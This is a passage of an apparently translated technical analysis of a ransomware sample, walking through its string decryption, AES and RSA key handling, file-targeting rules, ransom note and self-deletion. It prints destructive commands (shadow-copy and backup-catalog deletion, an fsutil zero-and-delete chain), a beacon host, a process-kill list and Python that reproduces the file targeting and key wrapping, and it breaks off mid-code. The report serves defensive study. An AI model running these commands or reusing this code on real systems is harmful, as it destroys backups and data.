--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x29
解密字符串:iplogger.com
解密HEX: 69706c6f676765722e636f6d0000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2a
解密字符串:/1JfuR4
解密HEX: 2f314a6675523400000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2b
解密字符串:wininet.dll;HttpOpenRequestA;HttpSendRequestA;InternetOpenA;InternetCloseHandle;InternetConnectA;
解密HEX: 77696e696e65742e646c6c3b487474704f70656e52657175657374413b4874747053656e6452657175657374413b496e7465726e65744f70656e413b496e7465726e6574436c6f736548616e646c653b496e7465726e6574436f6e6e656374413b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2c
解密字符串:%08X;%I64d.%02I64d
解密HEX: 253038583b25493634642e253032493634640000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x33
解密字符串:windows;winnt;\system32;\regedit.exe;
解密HEX: 770069006e0064006f00770073003b00770069006e006e0074003b005c00730079007300740065006d00330032003b005c0072006500670065006400690074002e006500780065003b0000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x36
解密字符串:�.Y!
解密HEX: f32e592100000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x37
解密字符串:�!@]
解密HEX: dc21405d00000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x38
解密字符串:%s /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "%s" & del /q /f "%s"
解密HEX: 2500730020002f0063002000700069006e006700200031002e0031002e0031002e00310020002d006e0020003500200026002000660073007500740069006c002000660069006c00650020007300650074005a00650072006f00440061007400610020006f00660066007300650074003d00300020006c0065006e006700740068003d0031003300310030003700320020002200250073002200200026002000640065006c0020002f00710020002f0066002000220025007300220000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x39
解密字符串:\Microsoft\Windows\Network Shortcuts
解密HEX: 5c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c004e006500740077006f0072006b002000530068006f00720074006300750074007300000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x3a
解密字符串:Your files were encrypted!
Please contact us for decryption.
解密HEX: 596f75722066696c6573207765726520656e63727970746564210a506c6561736520636f6e7461637420757320666f722064656372797074696f6e2e00000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4.1.5 Configuration initialisation (sub_4068B0)

  This routine first calls sub_402680 and then sub_407B10 to collect the Windows directory, the path of the running executable and several well-known system folders.

  sub_402680 mainly calls CryptAcquireContextW to set up a crypto context. The provider type is the same one the string-decryption routine uses, PROV_RSA_AES (0x18), as the screenshot shows.

  It then stores the encrypted string data at 0x41f000 into the structure at a1+8, and the string decrypted under flag 0xa into a1+36 (the flag-0xa entry is not an ordinary display string: it is the key blob that later routines consume, see 4.1.11, and is kept apart from the encrypted string table at a1+8). In short, this function initialises the string-decryption structure.

  With string decryption set up, sub_407B10 initialises the remaining configuration variables:

  GetSystemWindowsDirectoryW obtains the Windows directory (C:\Windows);

  GetModuleFileNameW obtains the sample's own path;

  SHGetSpecialFolderPathW obtains C:\ProgramData and C:\Users\Admin\Desktop.

  Once these are collected, the required strings are decrypted and the global variables initialised.

  Finally the decrypted string below is split on semicolons and the modules are loaded. Each group starts with a DLL name followed by the exports resolved from it, so these imports are resolved at run time and do not appear in the import table:

Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;

4.1.6 Initialising the dialog contents (sub_406D70)

  Before the analysis, the IDs of the GUI controls are worked out so that later descriptions can refer to a control by ID and type.

  Because this is a plain Win32 GUI program, DialogBoxParamW can be located and its callback DialogFunc analysed directly.

  In DialogFunc, a2 is the message type; there are handlers for dialog initialisation, button clicks, window close and so on.

  Start with a2 == 0x110 (WM_INITDIALOG). It fills edit control 1005 with the ID and the result of the privilege check. The ID is produced by get_ID (sub_408370).

  sub_408370 first decrypts the strings it needs, then reads SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId into Data.

  get_C_Volume_ID (sub_407C90) obtains the volume serial number of the system drive.

  get_C_Volume_ID decrypts the string SystemDrive, reads the environment variable SystemDrive (C:), and calls GetVolumeInformationW on that drive to obtain its volume serial number.

  The serial number is formatted as "-%08x", appended to the product ID, and the CRC32 of the whole string is returned. That CRC32 is the victim ID.

  This can be reproduced with a short script (Python 3 below; the CRC is taken over the ASCII bytes, so the hex digit case of the serial has to match what the sample formats). The result matched the ID displayed by the sample.

import binascii
# ProductId read from the registry + "-" + volume serial of the system drive, as the sample formats it
cipher1 = '00331-10000-00001-AA161-F8A08166'
print(hex(binascii.crc32(cipher1.encode()) & 0xffffffff))

  With the ID computed, the edit-box text is formatted by format_ID_admin (sub_403660).

  format_ID_admin first checks the return value of the earlier privilege check: if the process is running as administrator, v1 is set to "admin", otherwise to "not admin". Together with the ID this is formatted into "1. ID: %08X\r\n2. %s" to produce the final text.

  The formatted text is then written to the edit control for display.

  The values of byte_41A00E, byte_40A00D and byte_41A00F are used to set the state of checkboxes 1012, 1013 and 1015: a value of 1 means checked, anything else unchecked.

  The OS version is obtained to test whether it is older than Windows Vista; if so, ShowWindow is called.

  The system hotkey CTRL+ALT+V is registered to hide and show the window.

  The computer name is obtained and displayed in edit control 1011.

  At this point the initialisation of the dialog contents is complete.

4.1.7 Executing the encryption (sub_406D70)

  Execution flow chart:

  Analysis:

  Running the program shows that pressing the Start button triggers encryption; this too is implemented in the DialogFunc callback.

  When a2 == 0x111 (WM_COMMAND), a3 carries the control ID and a switch dispatches the control events. The handler for ID 1001, the Start button, is as follows.

  After Start is pressed, the length of the text in edit control 1014 is read. If it is 0, no encryption path was specified and a thread is created directly to run sub_405690; otherwise the text is passed as an argument to sub_405580.

  sub_405690 is essentially an initialisation function: it first calls sub_4033c0 to decrypt the required strings and initialise the corresponding structures, then selects which parts to run from the argument passed in. Here the argument is 2, so the body of the first conditional is not executed.

  After that check, sub_4076b0 determines the OS version; if it is above Windows Vista / Windows Server 2008 (by version number) the encryption flow starts.

  In start_enc, sub_4012C0 first enumerates the disk drives and stores their information in a structure, then produce_random_key generates two keys, and finally sub_4015D0 concatenates each generated key with the fixed value, the ID, the volume serial number and other fields and RSA-encrypts the result (see the key self-encryption section); the encrypted data is 128 bytes.

  With the keys generated and encrypted, sub_404BC0 enables UAC virtualisation, exec_del_shadow runs the shadow-copy deletion commands, and close_server stops the specified services and processes; these are described in detail below.

  Lastly the file encryption proper is performed by calling sub_401820, which starts encrypting the current directory.

  sub_401820 first calls sub_401720 to validate its a1 argument; if validation fails it returns without doing anything.

  Most of sub_401720 is assignments.

  The comparison proper takes the first 8 characters of the current path and compares them with the path field of the path_obj object; if they differ it returns 0, otherwise it returns the full path.

  In this run the path did not belong to any of the drives A-Z, so it returned immediately; execution continues into sub_4019C0, which walks the paths stored in path_obj.

  sub_4019C0 first checks whether path_obj is empty.

  If it is not, the remainder is the same as sub_401820; the only difference is the check at the start: one verifies that the path is on a local disk, the other walks the local disks directly.

  Next the required strings are decrypted: flags 0xE, 0xF and 0x9, which decrypt to 0x40000, 0x10 and chewbacca@cock.li respectively.

  The encryption parameters are then initialised into the argument structure and the encrypted-file suffix is assembled with the format

   .[%08X].[%s].%s, whose three arguments are the ID, the ransom e-mail and the encrypted-file extension, for example:

[sspdlk00036@cock.li].mkp

  Once initialisation is complete, a thread is created that runs StartAddress, which walks, filters and encrypts the paths.

  In StartAddress the main encryption logic is in sub_402210.

  sub_402210: the sub_402030 call just before it was skipped above because it is a path filter that sub_402210 calls again itself, so it is analysed only once here.

  sub_402030 filters on these keywords:

windows
winnt

  The return check that follows filters the following paths:

C:\Windows
C:\ProgramData\microsoft\windows\caches
C:\Users\All Users\Microsoft\Windows\Caches
Users\Public
C:\\ProgramData
C:\\Users

  After filtering, the folders and files under the path are enumerated with FindFirstFileW and a wildcard.

  The checks start with a simple validation of the file name: whether it begins with a dot (the "." and ".." entries) and whether it is empty.

  check_filename is then called to validate the file name and extension. It first obtains the extension,

  then checks the file type, i.e. whether it is a system file,

  and then compares: files with the extension exe, dll or SRC are not encrypted, nor are files with the following names.

  Excluded file names:

boot.ini
bootfont.bin
ntldr
ntdetect.com
io.sys
+README-WARNING+.txt
desktop.ini

  After filtering, the file size is tested: if it is less than or equal to 0x4000 bytes, flag32 is set to 1,

  otherwise to 0.

  The file attributes are then tested: if the file is read-only, flag33 in the structure is set to 1.

  Finally the file is encrypted; the encryption is implemented by enc_file (sub_403C100).

  enc_file first validates the flags, copies the file name to v4, and handles the read-only attribute: if the file to be encrypted is read-only, its attributes are changed to read/write.

  The file is opened for I/O.

  check_file_last is called to check whether the marker at the end of the file is present, i.e. whether the file is still a normal file.

  check_file_last reads the last four bytes and compares them with 21592EF3 (hex); if they match, the file is already encrypted and is skipped.

  If the last four bytes are not 21592EF3, the file is encrypted. The routine is chosen by size: files larger than 0x40000 bytes go to sub_4044E0, files of 0x40000 bytes or less go to sub_403EE0. The details are covered in the file encryption section.

  After encryption the file name is changed by appending the ransom suffix,

  using MoveFileW to rename the file.

  If the file was read-only, the attribute is restored after encryption.

  After each file is encrypted v35 is incremented (the count of encrypted files) and the next file in the directory is read.

  When all files have been processed the ransom note is written.

  The ransom note is written by sub_408BC0, after which the file stream is closed. This routine is analysed in detail in the ransom note section.

  This completes the bulk of the encryption flow.
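The skip rules described in this section decide which files survive an infection, which matters when scoping an incident. The following Python function is an added example written for this page, not code from the sample or from the original analysis: it encodes the directory, extension, file-name and size rules above and reports which encryption routine a file would be routed to. Assumptions: the system drive is C:, the excluded directories are compared case-insensitively and exactly against the file's parent directory, the keyword rule matches any path component, and the listing it runs over is constructed.

```python
import ntpath

# Skip rules recovered from the sample's path filter (sub_402030) and check_filename.
# Assumptions: the system drive is C:, and the listed directories are compared
# case-insensitively and exactly against the file's parent directory.
SKIP_DIR_KEYWORDS = {"windows", "winnt"}             # string 0x33: any path component
SKIP_DIRS = {
    r"c:\windows",
    r"c:\programdata\microsoft\windows\caches",      # string 0x19
    r"c:\users\all users\microsoft\windows\caches",  # string 0x25
    r"c:\users\public",                              # string 0x28
    r"c:\programdata",
    r"c:\users",
}
SKIP_EXTENSIONS = {"exe", "dll", "src"}
SKIP_FILENAMES = {"boot.ini", "bootfont.bin", "ntldr", "ntdetect.com",
                  "io.sys", "+readme-warning+.txt", "desktop.ini"}
QUICK_FLAG_SIZE = 0x4000      # flag32 is set for files at or below this size
BIG_FILE_SIZE = 0x40000       # larger files go to sub_4044E0, the rest to sub_403EE0


def classify(path: str, size: int) -> tuple:
    """Return ("skip", reason) or ("encrypt", routine, flag32) for one file."""
    directory, name = ntpath.split(path)
    parent = directory.lower().rstrip("\\")
    if any(part in SKIP_DIR_KEYWORDS for part in parent.split("\\")):
        return ("skip", "directory keyword")
    if parent in SKIP_DIRS:
        return ("skip", "excluded directory")
    lname = name.lower()
    if lname in SKIP_FILENAMES:
        return ("skip", "excluded filename")
    ext = lname.rsplit(".", 1)[-1] if "." in lname else ""
    if ext in SKIP_EXTENSIONS:
        return ("skip", "excluded extension")
    routine = "sub_4044E0" if size > BIG_FILE_SIZE else "sub_403EE0"
    return ("encrypt", routine, size <= QUICK_FLAG_SIZE)


# Constructed directory listing (path, size in bytes); not taken from a real host.
SAMPLE_LISTING = [
    (r"C:\Windows\System32\drivers\etc\hosts", 824),
    (r"C:\Users\alice\Documents\report.docx", 0x3000),
    (r"C:\Users\alice\Videos\talk.mp4", 0x500000),
    (r"C:\Users\alice\Desktop\tool.exe", 50000),
    (r"C:\Users\alice\+README-WARNING+.txt", 1200),
    (r"C:\Users\Public\notes.txt", 100),
]


def plan(listing=SAMPLE_LISTING) -> dict:
    """Map every path in the listing to its classification."""
    return {path: classify(path, size) for path, size in listing}


if __name__ == "__main__":
    for path, result in plan().items():
        print(f"{path}: {result}")
```

Files that come back as "skip" are the ones an incident responder should expect to find untouched (binaries, boot files, the caches folders); everything else is routed by size to one of the two encryption routines described in 4.1.12.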

4.1.8 Disk enumeration (sub_4012C0)

  SetErrorMode is called to change the error mode so that the system shows no error dialogs.

  The physical disks are enumerated and the ID value obtained.

  The routine loops over the letters A-Z and inserts the structure of each existing disk into the a1 object. A disk counts as present if its volume serial number can be read; otherwise the next letter is tried.

  From the field types, a structure can be defined to make the layout clearer.

  path_obj:

struct path_obj
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknown_fields;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
};

  After enumeration, the a1 object in memory consists of the number of disks and a pointer to the path_obj entries.

  The disk pointer references two path_obj entries here.

  The corresponding path_obj entries:

  This completes the enumeration of the system disks.

4.1.9 Key generation (produce_random_key)

  For how this function is called, see the encryption section; here only its implementation is described. It is easiest to follow using the structure built in the disk enumeration section.

  The routine loops over the disk structures (path_obj) stored during enumeration. For each, CryptAcquireContextW initialises a crypto context with the same provider type used for string decryption, then CryptGenRandom generates a 32-byte random value that is used as an encryption key.

  Two keys are generated per disk, both in the same way.

  They are stored at offsets 32 and 40 of the corresponding disk structure.

  path_obj can now be refined:

struct struct_v8
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknown_fields;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
  _DWORD first_produce_key;
  _DWORD first_produce_key_encdata;
  _DWORD second_produce_key;
  _DWORD second_produce_key_encdata;
};

  So each disk object path_obj carries two different keys.

4.1.10 Key self-encryption (sub_4015D0)

  The string under flag 0x37, dc21405d (hex), a fixed value, is decrypted first.

  All path_obj objects are then iterated; for each, the fields are extracted and concatenated in the format

fixed value + ID + VolumeSerialNumber + DriveType + Key

  the CRC32 of that data is computed and appended, giving the complete record

fixed value + ID + VolumeSerialNumber + DriveType + Key + CRC32

  which RSA_encode then RSA-encrypts into a 128-byte ciphertext.

  The result is stored in the first_produce_key_encdata and second_produce_key_encdata fields of path_obj.

4.1.11 RSA encryption (sub_402750)

  RSA_encode is straightforward: CryptAcquireContextW initialises the crypto context, CryptImportKey imports the key and CryptEncrypt performs the encryption. The algorithm is identified the same way as before: the key's blob header shows that this is an RSA key. Decoding the header: bType 0x06 (PUBLICKEYBLOB), aiKeyAlg 0xA400 (CALG_RSA_KEYX), then the RSAPUBKEY magic "RSA1", a bit length of 0x400 = 1024 and the public exponent 0x10001, followed by the 128-byte little-endian modulus. A 1024-bit key is why each encrypted key record is 128 bytes.

  The RSA public key is the string decrypted under flag 0xa:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000
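The key record of 4.1.10 and the RSA step of this section can be reproduced end to end. The Python below is an added example written for this page, not code from the sample or from the original analysis: it parses the PUBLICKEYBLOB above, builds one key record, checks its CRC32 and encrypts it with RSAES-PKCS1-v1_5, the padding CryptEncrypt applies to RSA keys by default, emitting the ciphertext little-endian as CryptoAPI does. Assumptions not stated on the page: the ID, volume serial and drive type are 4-byte little-endian DWORDs, the key is 32 bytes, and the ID, serial and key values in the demo are constructed. With those widths the record is 52 bytes, comfortably below the 117-byte limit PKCS#1 v1.5 imposes on a 1024-bit key.

```python
import os
import struct
import zlib

# Public key blob recovered from the sample (string-decryption flag 0xa), copied
# from the hex above; the trailing zero bytes are padding from the decryption buffer.
MAKOP_PUBLICKEYBLOB = bytes.fromhex(
    "0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6"
    "755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433"
    "185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309"
    "843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000"
)

PUBLICKEYBLOB = 0x06        # BLOBHEADER.bType
CALG_RSA_KEYX = 0x0000A400  # BLOBHEADER.aiKeyAlg


def parse_publickeyblob(blob: bytes) -> dict:
    """Parse a CryptoAPI PUBLICKEYBLOB: BLOBHEADER, RSAPUBKEY, then the little-endian modulus."""
    b_type, b_version, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if b_type != PUBLICKEYBLOB or magic != b"RSA1":
        raise ValueError("not an RSA PUBLICKEYBLOB")
    n_len = bitlen // 8
    if len(blob) < 20 + n_len:
        raise ValueError("blob truncated")
    modulus = int.from_bytes(blob[20:20 + n_len], "little")
    return {"version": b_version, "alg": alg, "bits": bitlen, "e": pubexp, "n": modulus}


def build_key_record(fixed: bytes, victim_id: int, volume_serial: int,
                     drive_type: int, key: bytes) -> bytes:
    """fixed || ID || VolumeSerialNumber || DriveType || Key || CRC32 of all of that.
    Field widths (4-byte little-endian DWORDs, 32-byte key) are an assumption."""
    body = fixed + struct.pack("<III", victim_id, volume_serial, drive_type) + key
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def verify_key_record(record: bytes) -> bool:
    """Check the trailing CRC32 of a key record (e.g. after decrypting one with the private key)."""
    body, crc = record[:-4], struct.unpack("<I", record[-4:])[0]
    return zlib.crc32(body) & 0xFFFFFFFF == crc


def rsa_encrypt_pkcs1_v15(pub: dict, data: bytes, rand=os.urandom) -> bytes:
    """RSAES-PKCS1-v1_5 encryption; the ciphertext is returned little-endian like CryptEncrypt."""
    k = pub["bits"] // 8
    if len(data) > k - 11:
        raise ValueError("message too long for PKCS#1 v1.5 with this key")
    ps_len = k - len(data) - 3
    ps = bytearray()
    while len(ps) < ps_len:                       # padding string must contain no zero bytes
        ps.extend(b for b in rand(ps_len) if b)
    em = b"\x00\x02" + bytes(ps[:ps_len]) + b"\x00" + data
    c = pow(int.from_bytes(em, "big"), pub["e"], pub["n"])
    return c.to_bytes(k, "little")


def encrypt_demo_record() -> bytes:
    """Build one record from constructed field values and encrypt it to the sample's public key."""
    pub = parse_publickeyblob(MAKOP_PUBLICKEYBLOB)
    record = build_key_record(
        fixed=bytes.fromhex("dc21405d"),   # flag 0x37 constant, raw bytes as decrypted
        victim_id=0x12345678,              # constructed; the real ID is CRC32(ProductId-serial)
        volume_serial=0xF8A08166,          # constructed
        drive_type=3,                      # DRIVE_FIXED
        key=bytes(range(32)),              # stands in for the CryptGenRandom key
    )
    assert verify_key_record(record)
    return rsa_encrypt_pkcs1_v15(pub, record)


if __name__ == "__main__":
    pub = parse_publickeyblob(MAKOP_PUBLICKEYBLOB)
    print(f"RSA-{pub['bits']}, e={pub['e']}, alg=0x{pub['alg']:X}")
    print(f"ciphertext: {len(encrypt_demo_record())} bytes")
```

Only the operator holds the matching private key, so the block cannot decrypt anything; its practical value is on the analysis side: confirming the key parameters from the blob, and, should a private key ever be obtained, verify_key_record gives a quick integrity check on each decrypted record before the AES key inside it is trusted.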

4.1.12 File encryption (sub_4044E0 / sub_403EE0)

  sub_4044E0 is the routine used for files larger than 0x40000 bytes; sub_403EE0 is used for files of 0x40000 bytes or less.

4.1.12.1 encrypto_big_file (sub_4044E0)

  The routine first obtains the file size, divides it by 3, stores the result in the structure's file_size_low field and passes it on as pdwDataLen.

  produce_random is called to generate the IV; the generation is not repeated here, it is described under encrypto_small_file below.

  Depending on the value of flag, the first or the second key is selected (flag is 1 here, so the first key), and sub_402AC0 imports the IV and key into the crypto context (the import routine is also described below).

  After key and IV are imported, the size of the file-name structure is computed from the length of the file name and rounded up to a multiple of 16 bytes.

  The information is then written into the file-name structure and CryptEncrypt encrypts it. The structure differs from the one in encrypto_small_file only in its first three padding fields, so no second structure was defined; its layout is:

min_size + filesize/3 + 0 + filesize + filename_len + filename + CRC32 of everything before it

  After the file-name structure is encrypted, the crypto context is destroyed and the data is written to the end of the file.

  Once the trailer is written, the file content is encrypted: the file pointer is moved to the start of the content and sub_404400 encrypts it.

  sub_404400 reads a block of min_size (0x40000) bytes, encrypts it and writes it back to the original file, which completes the encryption; the algorithm is again AES, in CBC mode.

  After encryption the crypto context is destroyed and the function returns.

4.1.12.2 encrypto_small_file (sub_403EE0)

  The routine first calls produce_random to generate a 16-byte random value, used as the IV.

  produce_random initialises a crypto context of provider type 0x18 and draws the random bytes from it.

  SetFilePointerEx moves the file pointer to the end of the file; the file size is computed and rounded up to a multiple of 16 bytes, and the missing bytes are written to the file as \x00 (via memset).

  The key is chosen from path_obj according to flag (1 here, so the first generated key), and sub_402AC0 imports key and IV into the crypto context.

  sub_402AC0 is a conventional CryptImportKey of the key.

  With the crypto context initialised, a structure makes the next part easier to read:

struct filename_struct
{
  _DWORD padding1;
  _DWORD padding2;
  _DWORD padding3;
  _DWORD file_size;
  _DWORD padding5;
  _DWORD filename_len;
  _DWORD file_name;
};

  The length of the file name plus 28 bytes is rounded up to a multiple of 16; the 28 is explained next.

  HeapAlloc then allocates that many bytes for the structure. The 28 bytes are everything in the structure other than the file name itself: the 24 bytes of header fields plus the 4-byte CRC32. As before, the structure content (zero padding + file size + file-name length + file name) is CRC32-hashed, the CRC is appended to form the complete block, and enc_data encrypts it.

  enc_data is plainly an encryption call using the IV and key just imported into the context, so this is AES in CBC mode.

  After the file-name block is encrypted, the crypto context is destroyed, the file pointer is moved to the end of the file and the encryption metadata is appended: the encrypted file size, the encrypted file-name data, the length of that data and the IV,

  followed by the RSA-encrypted key record, the fixed value and the encrypted-file marker.

  With the metadata written, sub_402AC0 imports key and IV again, and the routine checks whether the number of bytes already encrypted is greater than or equal to the file size, i.e. whether encryption is complete. If not, it continues with the encryption below; if so, it destroys the crypto context, moves the file pointer to the end and writes 8 bytes of FF.

  Since encryption is only starting, the encrypted size is 0 and the routine goes straight into the encryption loop.

  The file pointer is moved to the start of the file and the remaining size computed; as nothing is encrypted yet this equals the file size. If the remaining size is smaller than the minimum block (16 bytes) it is set to 16, and that many bytes are read into read_buffer.

  The amount read is checked for 16-byte alignment and padded with 00 bytes if necessary.

  enc_data encrypts all of read_buffer, the file pointer is moved back to the start of the file, the ciphertext is written out and the encrypted-size counter is updated.

  After each pass the encrypted size is compared with the file size; if it is smaller, content remains and the loop continues, otherwise encryption ends.

  When all content is encrypted the crypto context is destroyed and 8 bytes of FF are appended after the content.

  As seen in the file content:

  Finally the crypto context is destroyed, resources are released and the function returns. Note that check_file_last (4.1.7) tests the final four bytes of a file for 21592EF3, so the exact order of the trailer, including where the 8 FF bytes sit relative to the marker, should be confirmed on a sample file before writing a parser for it.

4.1.13 Writing the ransom note (sub_408BC0)

  The routine first decrypts the strings it uses: +README-WARNING+.txt, YOUR_FILES_ARE_ENCRYPTED, ::: Greetings ::: and the rest of the note (only part of the note is shown).

  It checks whether a ransom note path was specified; if so, write_random_note writes the note.

  write_random_note decides, based on whether the process is running as administrator, whether to call CreateDirectoryW to create the directory, and then calls write_ransom_note.

  write_ransom_note is a simple path concatenation followed by writing the note contents to that path.

  After the note is written, resources are released and the function returns.

4.1.14 Wallpaper replacement (sub_4084E0)

  The screen information of the device is obtained first.

  A canvas of the screen's size is created and the text to be shown on the ransom wallpaper is decrypted.

  The text is drawn onto the canvas and the canvas background colour is set.

  The temporary directory path is obtained, a temporary file is created, .bmp is appended to its name to form a temporary image file, and the canvas is written to it.

  SystemParametersInfoW sets the wallpaper path to the newly created image file, replacing the wallpaper.

  Resources are then released.

  The file can be found afterwards in the temp directory.

4.1.15 Shadow copy deletion (exec_del_shadow)

  This function is simple: it decrypts the commands it uses and passes them to shell_exec. The commands executed:

vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

4.1.16 Stopping specified services (close_server)

  This function is also simple: it decrypts the executable names of all targeted services and processes and formats them into a list. The executable names:

sqlbrowser.exe
sqlwriter.exe
sqlservr.exe
msmdsrv.exe
MsDtsSrvr.exe
sqlceip.exe
fdlauncher.exe
Ssms.exe
sqlagent.exe
fdhost.exe
ReportingServicesService.exe
msftesql.exe
pg_ctl.exe
postgres.exe
UniFi.exe
armsvc.exe
IntelCpHDCPSvc.exe
OfficeClickToRun.exe
DellOSDService.exe
DymoPnpService.exe
Agent.exe
FJTWMKSV.exe
IPROSetMonitor.exe
IRMTService.exe
MBCloudEA.exe
QBCFMonitorService.exe
QBIDPService.exe
RstMwService.exe
TeamViewer_Service.exe
dasHost.exe
IntelCpHeciSvc.exe
RAVBg64.exe
vds.exe
unsecapp.exe
TodoBackupService.exe
MediaButtons.exe
IAStorDataMgrSvc.exe
jhi_service.exe
LMS.exe
DDVDataCollector.exe
DDVCollectorSvcApi.exe
TeamViewer.exe
tv_w32.exe
tv_x64.exe
Microsoft.Photos.exe
MicrosoftEdge.exe
ApplicationFrameHost.exe
browser_broker.exe
MicrosoftEdgeSH.exe
MicrosoftEdgeCP.exe
RtkNGUI64.exe
WavesSvc64.exe
OneDrive.exe
DYMO.DLS.Printing.Host.exe
FtLnSOP.exe
FjtwMkup.exe
FTPWREVT.exe
FTErGuid.exe
qbupdate.exe
QBWebConnector.exe
ShellExperienceHost.exe
RuntimeBroker.exe
IAStorIcon.exe
PrivacyIconClient.exe
SupportAssistAgent.exe
SecurityHealthService.exe
taskhostw.exe
taskhosta.exe
wijca.exe
ktfwswe.exe
HeciServer.exe
mdm.exe
ULCDRSvr.exe
WLIDSVC.EXE
WLIDSVCM.EXE
GoogleCrashHandler.exe
GoogleCrashHandler64.exe
RAVCpl64.exe
igfxtray.exe
hkcmd.exe
igfxpers.exe
PsiService_2.exe
UNS.exe
taskeng.exe
AdobeARM.exe
LenovoReg.exe
dwm.exe
wuauclt.exe
avp.exe
FBService.exe
LBAEvent.exe
PDFProFiltSrvPP.exe
avpsus.exe
klnagent.exe
vapm.exe
ScanToPCActivationApp.exe
BrStMonW.exe
BrCtrlCntr.exe
concentr.exe
redirector.exe
BrccMCtl.exe
BrYNSvc.exe
Receiver.exe
BrCcUxSys.exe
LSCNotify.exe
SelfServicePlugin.exe
wfcrun32.exe
HPNETW~1.EXE
HPScan.exe
taskhost.exe
Teams.exe
AuthManSvr.exe
WLXPhotoGallery.exe
outlook.exe
prevhost.exe
excel.exe
chrome.exe
AcroRd32.exe
RdrCEF.exe
vssadmin.exe
WmiPrvSE.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
agntsrvc.exe
mydesktopqos.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
encsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
powerpnt.exe
steam.exe
thebat.exe
thebat64.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe

  It then enumerates the running processes with Process32FirstW, obtains each process's executable name and compares it with the list; on a match it calls TerminateProcess on that process, otherwise it moves on with Process32NextW.

4.1.17 Self-deletion (sub_407890)

  The location of cmd.exe is obtained by reading the environment variable ComSpec.

  The cmd.exe path and the path of the sample's own executable are formatted into the string decrypted under flag 0x38 to form the complete command:

C:/Windows/System32/cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 encode.exe & del /q /f encode.exe

    The command is then executed, deleting the encryptor. The ping gives the encryptor time to exit, fsutil overwrites the first 131072 bytes (128 KB) of the file with zeros, which for this 89.50 KB sample is the whole file, and only then is it deleted. The binary therefore cannot be carved back from free disk space; it has to be acquired before it finishes running, or from another source such as EDR quarantine or the original delivery channel.
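The shadow-copy commands of 4.1.15 and the self-delete chain of this section are the most detectable moments of the run, because both go through cmd.exe with fixed argument strings. The Python below is an added example for this page, not code from the sample or from the original analysis: it runs a small set of command-line rules over constructed process-creation events built from the recovered strings. The events, their PIDs and the path used for the encryptor are constructed; the rules match on the command line only, so they are independent of the logging source.

```python
import re

# Constructed process-creation events (not collected from a real host); the command
# lines are built from the strings recovered above (flag 0x38 and exec_del_shadow).
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": "vssadmin delete shadows /all /quiet"},
    {"pid": 4124, "cmdline": "wbadmin delete catalog -quiet"},
    {"pid": 4130, "cmdline": "wmic shadowcopy delete"},
    {"pid": 4188, "cmdline": r'C:\Windows\System32\cmd.exe /c ping 1.1.1.1 -n 5 & '
                             r'fsutil file setZeroData offset=0 length=131072 "C:\Users\Public\mkp_visual.exe" & '
                             r'del /q /f "C:\Users\Public\mkp_visual.exe"'},
    {"pid": 5000, "cmdline": "vssadmin list shadows"},   # benign: listing, not deleting
    {"pid": 5020, "cmdline": "ping 1.1.1.1 -n 5"},       # benign: the delay alone is not a signal
]

# Each rule is (name, compiled regex applied to the full command line).
RULES = [
    ("shadow_copy_deletion", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("backup_catalog_deletion", re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b", re.I)),
    ("shadow_copy_de­letion".replace("\u00ad", ""), re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    # The self-delete chain: zero a file with fsutil, then delete the same path.
    ("self_delete_zero_then_del", re.compile(
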